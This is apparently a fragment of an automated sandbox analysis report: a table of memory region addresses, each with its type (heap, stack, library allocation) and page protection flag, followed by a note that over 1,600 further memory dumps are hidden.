1BF2C1E0000
|
trusted library allocation
|
page read and write
|
||
6C68A000
|
unkown
|
page read and write
|
||
1BF1C3CF000
|
trusted library allocation
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
1C8AEBBB000
|
trusted library allocation
|
page read and write
|
||
1BF1C424000
|
trusted library allocation
|
page read and write
|
||
4B32000
|
heap
|
page read and write
|
||
1BF1C2FB000
|
trusted library allocation
|
page read and write
|
||
1C8ACCFE000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
1C8AEE8F000
|
trusted library allocation
|
page read and write
|
||
636C000
|
heap
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C8DA000
|
trusted library allocation
|
page read and write
|
||
C27DDFE000
|
stack
|
page read and write
|
||
524D000
|
heap
|
page read and write
|
||
63BB000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
1BF1C224000
|
trusted library allocation
|
page read and write
|
||
3AD3000
|
heap
|
page read and write
|
||
1BF2D765000
|
trusted library allocation
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
3B2C000
|
heap
|
page read and write
|
||
1BF2DF88000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
22500344000
|
trusted library allocation
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
15B55AC5000
|
heap
|
page read and write
|
||
5E18000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1BF1C3DF000
|
trusted library allocation
|
page read and write
|
||
1C8AEBBF000
|
trusted library allocation
|
page read and write
|
||
62B4000
|
heap
|
page read and write
|
||
6C540000
|
unkown
|
page write copy
|
||
266D1985000
|
heap
|
page read and write
|
||
6C781000
|
unkown
|
page execute read
|
||
1BF2D768000
|
trusted library allocation
|
page read and write
|
||
1BF1C7C6000
|
trusted library allocation
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
61F3000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4CB2000
|
heap
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
1BF2C24D000
|
trusted library allocation
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
1BF2DF96000
|
trusted library allocation
|
page read and write
|
||
1BF2D7B7000
|
trusted library allocation
|
page read and write
|
||
1BF1C4A1000
|
trusted library allocation
|
page read and write
|
||
22510001000
|
trusted library allocation
|
page read and write
|
||
2463BAFF000
|
trusted library allocation
|
page read and write
|
||
4B5C000
|
heap
|
page read and write
|
||
1BF2C9FA000
|
trusted library allocation
|
page read and write
|
||
3ABA000
|
heap
|
page read and write
|
||
CF5B6FE000
|
stack
|
page read and write
|
||
1BF2C27D000
|
trusted library allocation
|
page read and write
|
||
4F67000
|
heap
|
page read and write
|
||
2463B681000
|
trusted library allocation
|
page read and write
|
||
1D75C715000
|
heap
|
page read and write
|
||
54B6000
|
heap
|
page read and write
|
||
2867C860000
|
heap
|
page read and write
|
||
1BF2C878000
|
trusted library allocation
|
page read and write
|
||
50E7000
|
heap
|
page read and write
|
||
5792000
|
heap
|
page read and write
|
||
4B17000
|
heap
|
page read and write
|
||
2750047D000
|
trusted library allocation
|
page read and write
|
||
24639B1D000
|
heap
|
page read and write
|
||
1C8AEBB9000
|
trusted library allocation
|
page read and write
|
||
3AA7000
|
heap
|
page read and write
|
||
1BF362E7000
|
heap
|
page read and write
|
||
1BF2C26E000
|
trusted library allocation
|
page read and write
|
||
1BF1C46A000
|
trusted library allocation
|
page read and write
|
||
1C8AD1C0000
|
heap
|
page read and write
|
||
502C000
|
heap
|
page read and write
|
||
1BF2CA0F000
|
trusted library allocation
|
page read and write
|
||
2463B70F000
|
trusted library allocation
|
page read and write
|
||
22500479000
|
trusted library allocation
|
page read and write
|
||
1BF1C477000
|
trusted library allocation
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
6C1E4000
|
unkown
|
page write copy
|
||
4BE3000
|
heap
|
page read and write
|
||
1C8AEFBD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
1D6C7399000
|
heap
|
page read and write
|
||
49B7000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
28600448000
|
trusted library allocation
|
page read and write
|
||
3A50000
|
heap
|
page read and write
|
||
4B83000
|
heap
|
page read and write
|
||
27EBECC000
|
stack
|
page read and write
|
||
6E504FE000
|
stack
|
page read and write
|
||
2463BA23000
|
trusted library allocation
|
page read and write
|
||
1BF2D0E5000
|
trusted library allocation
|
page read and write
|
||
1C8AEBC5000
|
trusted library allocation
|
page read and write
|
||
1BF2C171000
|
trusted library allocation
|
page read and write
|
||
1C8AEE87000
|
trusted library allocation
|
page read and write
|
||
45C5000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2D8BA000
|
trusted library allocation
|
page read and write
|
||
24639A8A000
|
heap
|
page read and write
|
||
1BF1C266000
|
trusted library allocation
|
page read and write
|
||
27567CB5000
|
heap
|
page read and write
|
||
27500333000
|
trusted library allocation
|
page read and write
|
||
2867CD90000
|
heap
|
page read and write
|
||
266D15FC000
|
heap
|
page read and write
|
||
24639CC0000
|
trusted library allocation
|
page read and write
|
||
1BF1C457000
|
trusted library allocation
|
page read and write
|
||
1BF2CFDE000
|
trusted library allocation
|
page read and write
|
||
4FA8000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
4C58000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
2463B6EF000
|
trusted library allocation
|
page read and write
|
||
4A2D000
|
heap
|
page read and write
|
||
1C8ACD9E000
|
heap
|
page read and write
|
||
2463B9D7000
|
trusted library allocation
|
page read and write
|
||
1BF2C174000
|
trusted library allocation
|
page read and write
|
||
1D6C7320000
|
heap
|
page read and write
|
||
61E2000
|
heap
|
page read and write
|
||
1BF1C669000
|
trusted library allocation
|
page read and write
|
||
1BF2C2D6000
|
trusted library allocation
|
page read and write
|
||
1BF35210000
|
heap
|
page read and write
|
||
3A9E000
|
heap
|
page read and write
|
||
266EB9A0000
|
heap
|
page execute and read and write
|
||
3AD1000
|
heap
|
page read and write
|
||
1C8AEFBF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
27500001000
|
trusted library allocation
|
page read and write
|
||
1C8AEEE5000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
1D6C7300000
|
heap
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
5DCE000
|
heap
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
3ACB000
|
heap
|
page read and write
|
||
CCB93FF000
|
stack
|
page read and write
|
||
27567AB0000
|
trusted library allocation
|
page read and write
|
||
2463BA21000
|
trusted library allocation
|
page read and write
|
||
1BF2DFA0000
|
trusted library allocation
|
page read and write
|
||
4AAA000
|
heap
|
page read and write
|
||
3AB9000
|
heap
|
page read and write
|
||
1C8AEE97000
|
trusted library allocation
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
1C8AEEED000
|
trusted library allocation
|
page read and write
|
||
1C8AEE93000
|
trusted library allocation
|
page read and write
|
||
13F0000
|
heap
|
page read and write
|
||
3AAA000
|
heap
|
page read and write
|
||
1AD1335A000
|
heap
|
page read and write
|
||
65F3000
|
heap
|
page read and write
|
||
D7987FF000
|
unkown
|
page read and write
|
||
62ED000
|
heap
|
page read and write
|
||
1D6C7384000
|
heap
|
page read and write
|
||
2867C92B000
|
heap
|
page read and write
|
||
1205000
|
unkown
|
page read and write
|
||
1C8ACF40000
|
heap
|
page read and write
|
||
C27D8FE000
|
stack
|
page read and write
|
||
24639A30000
|
heap
|
page read and write
|
||
2860035B000
|
trusted library allocation
|
page read and write
|
||
10A6CFF000
|
unkown
|
page read and write
|
||
1C8AEBD3000
|
trusted library allocation
|
page read and write
|
||
50C4000
|
heap
|
page read and write
|
||
7FFD9B929000
|
trusted library allocation
|
page read and write
|
||
2860008F000
|
trusted library allocation
|
page read and write
|
||
65FA000
|
heap
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
2CB12B10000
|
heap
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
2463B9B3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
6C5F2000
|
unkown
|
page write copy
|
||
4BCE000
|
heap
|
page read and write
|
||
1C8AEFA7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
506E000
|
heap
|
page read and write
|
||
6C51B000
|
unkown
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
2463B9D3000
|
trusted library allocation
|
page read and write
|
||
22579240000
|
heap
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
1BF1C794000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
2867C92D000
|
heap
|
page read and write
|
||
22578F8B000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
4B97000
|
heap
|
page read and write
|
||
1BF2C7D6000
|
trusted library allocation
|
page read and write
|
||
28600333000
|
trusted library allocation
|
page read and write
|
||
2867C91E000
|
heap
|
page read and write
|
||
4B51000
|
heap
|
page read and write
|
||
28600349000
|
trusted library allocation
|
page read and write
|
||
1BF2D8FA000
|
trusted library allocation
|
page read and write
|
||
4527000
|
heap
|
page read and write
|
||
1BF34FA5000
|
heap
|
page read and write
|
||
1C8ACCD0000
|
heap
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C274000
|
trusted library allocation
|
page read and write
|
||
1BF2D9E5000
|
trusted library allocation
|
page read and write
|
||
1C8AEFBB000
|
trusted library allocation
|
page read and write
|
||
28600089000
|
trusted library allocation
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
2463BAF3000
|
trusted library allocation
|
page read and write
|
||
1BF1C403000
|
trusted library allocation
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
1BF2D88F000
|
trusted library allocation
|
page read and write
|
||
1C8AEB71000
|
trusted library allocation
|
page read and write
|
||
275004AA000
|
trusted library allocation
|
page read and write
|
||
28115900000
|
heap
|
page read and write
|
||
1BF2C191000
|
trusted library allocation
|
page read and write
|
||
4B5C000
|
heap
|
page read and write
|
||
266D3590000
|
trusted library allocation
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
1C8AEFB6000
|
trusted library allocation
|
page read and write
|
||
1BF34C80000
|
heap
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
24639A8C000
|
heap
|
page read and write
|
||
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
24639A6B000
|
heap
|
page read and write
|
||
6C820000
|
unkown
|
page readonly
|
||
4AB7000
|
heap
|
page read and write
|
||
1BF2D19A000
|
trusted library allocation
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
2811565A000
|
heap
|
page read and write
|
||
1AD13330000
|
heap
|
page read and write
|
||
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
2867CBB0000
|
heap
|
page execute and read and write
|
||
1BF2DF65000
|
trusted library allocation
|
page read and write
|
||
4B3F000
|
heap
|
page read and write
|
||
437F000
|
heap
|
page read and write
|
||
6C82B000
|
unkown
|
page readonly
|
||
6C543000
|
unkown
|
page write copy
|
||
4B81000
|
heap
|
page read and write
|
||
1C8AEFAA000
|
trusted library allocation
|
page read and write
|
||
6C1E1000
|
unkown
|
page read and write
|
||
22500095000
|
trusted library allocation
|
page read and write
|
||
266D3110000
|
heap
|
page execute and read and write
|
||
4ADF000
|
heap
|
page read and write
|
There are 1669 hidden memdumps, click here to show them.